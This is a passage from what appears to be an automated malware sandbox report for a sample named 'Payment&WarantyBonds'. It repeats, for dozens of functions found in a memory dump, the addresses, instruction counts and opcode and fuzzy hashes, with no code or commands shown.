                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d98e9156f7790f0fe0fdb4ec18f6c90e91fe884f847eab08caa1e52dcec93266
                                                                                                                                                                                • Instruction ID: 068ed8555ee1964eb70fe27ebbdf9e3dc052e4e335fb15a693e30879fae9cd39
                                                                                                                                                                                • Opcode Fuzzy Hash: d98e9156f7790f0fe0fdb4ec18f6c90e91fe884f847eab08caa1e52dcec93266
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C3170B19002118BD731AF58CC40BF9B7B4EF94314F44816FD94A9F3A6DA74D986CB90
                                                                                                                                                                                Function 014DC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                • Instruction ID: 20a675dc2303af720d328645cef3d8a71ba94292ad3dd3737c0e95a17f70edc5
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D214F36600652B7CF15AB968C50EBBBBB5EF60710F40802FFA958B6B1E634D944C360
                                                                                                                                                                                Function 01454588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                • Instruction ID: 987bbf65226fe52c0ce9b8dfed6489fbd43bff627c1869901bde0b03d6c3fbe1
                                                                                                                                                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                • Instruction Fuzzy Hash: EA21B435A00609EFCB50CF59C580A8EBBF5FF58314F54806AEE199F252E674DA418B60
                                                                                                                                                                                Function 0141E388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                • Instruction ID: b56ffa5ffa53794e5e2805bf727b96d4cfb00935f229263d7d0a23690f7def00
                                                                                                                                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A318D35600604AFD721CF69C884F6AB7B9EF85354F1445AAE916DB2A5E730ED02CB50
                                                                                                                                                                                Function 0145D530 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 58fda25f741d2a5664bb7e38a883ef97a8b4ea4665bb820dfe1eeb5d7be6db6b
                                                                                                                                                                                • Instruction ID: 9680659c70c367ede649085b215883044ce1728842913b43e740aeda32d5a2eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 58fda25f741d2a5664bb7e38a883ef97a8b4ea4665bb820dfe1eeb5d7be6db6b
                                                                                                                                                                                • Instruction Fuzzy Hash: FB21F6729042069BDB21EFAA8900F177BE8BFB9654F01082BFA149B275E774D805C7A1
                                                                                                                                                                                Function 0144F32A Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                                                                                                • Instruction ID: e12dd58684a6141962b6fac932ad84d76db0270cf44b7c92718f1758b49ee842
                                                                                                                                                                                • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                                                                                                • Instruction Fuzzy Hash: AA21D1722002019FE719CF19C441B67BBE9EF95360F15416EE50A8B3A1EB70EC05CB94
                                                                                                                                                                                Function 014A019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e5faff1db44c0d1ee8b2323206ab8e32967ee3ef22b3d34414cd4751dcdeecdf
                                                                                                                                                                                • Instruction ID: 4b0a787d8333504e1c16f77ba9068403ef044cb98d973b507b76e9925e427b39
                                                                                                                                                                                • Opcode Fuzzy Hash: e5faff1db44c0d1ee8b2323206ab8e32967ee3ef22b3d34414cd4751dcdeecdf
                                                                                                                                                                                • Instruction Fuzzy Hash: C721A972600645AFD715DF69D840A6AB7A8FFA8744F14006AF904DB7A0E638ED00CBA8
                                                                                                                                                                                Function 014C71F9 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 61239e68ea3e7b849711b9c9dc2f1770a646757384e952cc284417c59ce39806
                                                                                                                                                                                • Instruction ID: 7146d1b131a9c08356c825636a645134bd01709ef78b98b3e49a454608ea1067
                                                                                                                                                                                • Opcode Fuzzy Hash: 61239e68ea3e7b849711b9c9dc2f1770a646757384e952cc284417c59ce39806
                                                                                                                                                                                • Instruction Fuzzy Hash: F62130359047414BD361DF2A8440B2BBBEAFFE4B15F10492FF8A683271CB70A8468B91
                                                                                                                                                                                Function 014A0283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8626ed447ab6054a44bdfdac47faebe3184c33545ca0b672f19972f75a1f9bd3
                                                                                                                                                                                • Instruction ID: 40c695233eca7ab6902cd252ff59f66f72cd47a124c457e97af01d72d014b642
                                                                                                                                                                                • Opcode Fuzzy Hash: 8626ed447ab6054a44bdfdac47faebe3184c33545ca0b672f19972f75a1f9bd3
                                                                                                                                                                                • Instruction Fuzzy Hash: 1121FF729043469FE311EF5AD848B6BBBDCAFB5240F09045BB980C7271D734D909C7A2
                                                                                                                                                                                Function 0149D0C0 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                                                                                • Instruction ID: 2791adb97b369f37510d6d2569ee3830d61f07dc0799a9a2df6fa56af8a85e30
                                                                                                                                                                                • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 1721C2B2A44701ABD7119F59CC42B5BBFA4FB98764F00012FF9499B3B0D334E80187A9
                                                                                                                                                                                Function 0145A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 48e3a433488fac581c8ff1a1bf572fb5667088e1b329d74fac5ce2c707cae38a
                                                                                                                                                                                • Instruction ID: e1fb00e56740dadd6842a9e712fa5c7c0626fa5ee266cd0cadab20ecd8a10899
                                                                                                                                                                                • Opcode Fuzzy Hash: 48e3a433488fac581c8ff1a1bf572fb5667088e1b329d74fac5ce2c707cae38a
                                                                                                                                                                                • Instruction Fuzzy Hash: C021AC752006019FCB25DF29C801B4677F5BF58718F24846DA909CB762E775E842CB94
                                                                                                                                                                                Function 014B80A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                                • Instruction ID: f3833b4bc87290193d9074bf63d6d301316142b7f0b5028c5ee572635e9cc8cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                                • Instruction Fuzzy Hash: 2621817290020AEFDF129F59CC80BEEBBB9EF98320F24445AF940A7261D734D9519F60
                                                                                                                                                                                Function 014415A9 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                                                                                                • Instruction ID: 28e287cebf5a311391bc8bc79f34685c53384fec5b4ae159a9defc91dc36de0e
                                                                                                                                                                                • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                                                                                                • Instruction Fuzzy Hash: DA210471600685DFFB12EB5DC948B6A7BE4AF54A54F2900A3ED01CB372E778DC82C650
                                                                                                                                                                                Function 01450124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                • Instruction ID: 4ba357b3eaab731fda56e803fe6923f99cfdfee9b1eec4be9fd10860cafa1bf8
                                                                                                                                                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D11EF76600605BFE7229F49CC41F9ABBB8EB90754F10002AFA008F2A1E672ED44CB61
                                                                                                                                                                                Function 014280E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 963f3c3082242e363d5ceabb77e6d1b2b110543e8990c4da5fbf9066975a6370
                                                                                                                                                                                • Instruction ID: f371afe671bcbd42d20a2cb4578c8e2a278df7478cceb8ad23683766c319dd43
                                                                                                                                                                                • Opcode Fuzzy Hash: 963f3c3082242e363d5ceabb77e6d1b2b110543e8990c4da5fbf9066975a6370
                                                                                                                                                                                • Instruction Fuzzy Hash: 27218E31A00206DFCB14CF58C581A6EBBF5FB88314F30416ED105AB3A5C771AD46CB90
                                                                                                                                                                                Function 014AD080 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 25b614696a0972c3a281a1ec876d041fdb4b31fdef0c2d8cab0acb2986cf2880
                                                                                                                                                                                • Instruction ID: db43ecdd46b47dce540015bd7d78698dd15623cc36f067c5e14983a16263afd7
                                                                                                                                                                                • Opcode Fuzzy Hash: 25b614696a0972c3a281a1ec876d041fdb4b31fdef0c2d8cab0acb2986cf2880
                                                                                                                                                                                • Instruction Fuzzy Hash: 74110272640241ABD733AF6A8C40F2377A8EBF9674F52043EFA145F6B1D634A801C790
                                                                                                                                                                                Function 01419240 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 08a55c78fc2d9fd8cafbf1f2ee68e7555c14790f6508855f2c7889cd06b7ba0e
                                                                                                                                                                                • Instruction ID: 0222026c9a9c533ad10ac9990b12382d4b8e9118b92a3e0ea74ef8863f4842d4
                                                                                                                                                                                • Opcode Fuzzy Hash: 08a55c78fc2d9fd8cafbf1f2ee68e7555c14790f6508855f2c7889cd06b7ba0e
                                                                                                                                                                                • Instruction Fuzzy Hash: 7711087A011241AAD7329F55D901A7237F9FBA87A0F11442AE8109F368E334DD05DB64
                                                                                                                                                                                Function 0144B052 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 24a509beaae789d110893cf401f362a2f8efe6863346350ff69d9d2a1bca0905
                                                                                                                                                                                • Instruction ID: a931ec9905104c270383fdc3cecf1e899639f6b8a96abd9288ba0cd4b50bb12d
                                                                                                                                                                                • Opcode Fuzzy Hash: 24a509beaae789d110893cf401f362a2f8efe6863346350ff69d9d2a1bca0905
                                                                                                                                                                                • Instruction Fuzzy Hash: C601F9B27003016BF725AB6B9C80F6BB7FCDFA4615F04003EE706D7250D670E9018621
                                                                                                                                                                                Function 01417330 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 999e4f9e4fbb407987f72d138c9ba6c441462dc891a89b256aee6161b8534a2e
                                                                                                                                                                                • Instruction ID: 276fb75f276914aa712a1f9d10b87b3303218ccf2f660400d31aaf15e3e9b32f
                                                                                                                                                                                • Opcode Fuzzy Hash: 999e4f9e4fbb407987f72d138c9ba6c441462dc891a89b256aee6161b8534a2e
                                                                                                                                                                                • Instruction Fuzzy Hash: 8211A0716006099FE721CF59C842B6B7BE8EB44315F05482BEA85CB321D735ED11CBA1
                                                                                                                                                                                Function 0144E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                • Instruction ID: e2c42a26ed1d58b231ad4af820c155cc887a30d24530786ada1a494b64a9cb8c
                                                                                                                                                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                • Instruction Fuzzy Hash: 0511A071201A829BF722AB6DD948B2A7B94BB50654F1900A3DE4197772F33CC847C290
                                                                                                                                                                                Function 0144F2D0 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 32df73cdaffe00bfcfc12297eb1d01637918e688fb57a192701e3d44ec50d588
                                                                                                                                                                                • Instruction ID: 0d7439d2a2b4064af309543fc6ec78e6c7f68cba4716dab41d31699512ae16a1
                                                                                                                                                                                • Opcode Fuzzy Hash: 32df73cdaffe00bfcfc12297eb1d01637918e688fb57a192701e3d44ec50d588
                                                                                                                                                                                • Instruction Fuzzy Hash: AF1102B16006489BDB21DF69D844BAEBBB8FF58700F04006BE901EB361D639D905C750
                                                                                                                                                                                Function 014B72A0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                                                                                                • Instruction ID: d1f90304d21aceb6b7a498188669cf96207d036495746479c68539a492a769cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                                                                                                • Instruction Fuzzy Hash: F6019272240506BFE715AF56CC80E93FB6DFFA47A5B40052AF250525B0C771ACA1CAA4
                                                                                                                                                                                Function 0141A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                • Instruction ID: ee38c62ba82a5b6fb5a3fd0ceaa5eeb056c8ceebc9ab688be6c1b1b516b0437a
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E0126714067629BCB318F19D840AB37BA4EF55760B10852EFC958B3A5C331D405CB60
                                                                                                                                                                                Function 0149E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 07027adf542ba34d8c6847714ef194b7fd3e7782d965c94384e7c25953d20179
                                                                                                                                                                                • Instruction ID: 370cba72e6b785ef7a0f0e5ed0b0dd83d87c962ed719a03a848b94afaa9f7085
                                                                                                                                                                                • Opcode Fuzzy Hash: 07027adf542ba34d8c6847714ef194b7fd3e7782d965c94384e7c25953d20179
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A11C036241241EFDB16EF1ACD90F16BBB8FF68B54F2000AAF9059B661C675ED01CA90
                                                                                                                                                                                Function 01426259 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 59f3573af9df0baed7b21f59e99647e72c99756eb558d113c5eca0f679bd3577
                                                                                                                                                                                • Instruction ID: e35bb20ac78fe331d956f0af0249eab25a911ef5cad04dc75f824a7f64e1ff07
                                                                                                                                                                                • Opcode Fuzzy Hash: 59f3573af9df0baed7b21f59e99647e72c99756eb558d113c5eca0f679bd3577
                                                                                                                                                                                • Instruction Fuzzy Hash: 09119E71501228ABDB25AF25CC41FE97278EB24714F50419AA718A61F0D6709E85CF95
                                                                                                                                                                                Function 014A6050 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 761ea585d627e9865e9903f1fc274b2974817a5029d7d6d72b3e959bfb7fecbd
                                                                                                                                                                                • Instruction ID: d9e39a90b3de0aeef47918d092e99cd925f36c560e155a669643a3d2a94d213c
                                                                                                                                                                                • Opcode Fuzzy Hash: 761ea585d627e9865e9903f1fc274b2974817a5029d7d6d72b3e959bfb7fecbd
                                                                                                                                                                                • Instruction Fuzzy Hash: DA112DB3900119ABCB12DB95CC80DDF777CEF58258F054166E906E7211EA34EA55CBE0
                                                                                                                                                                                Function 0142208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
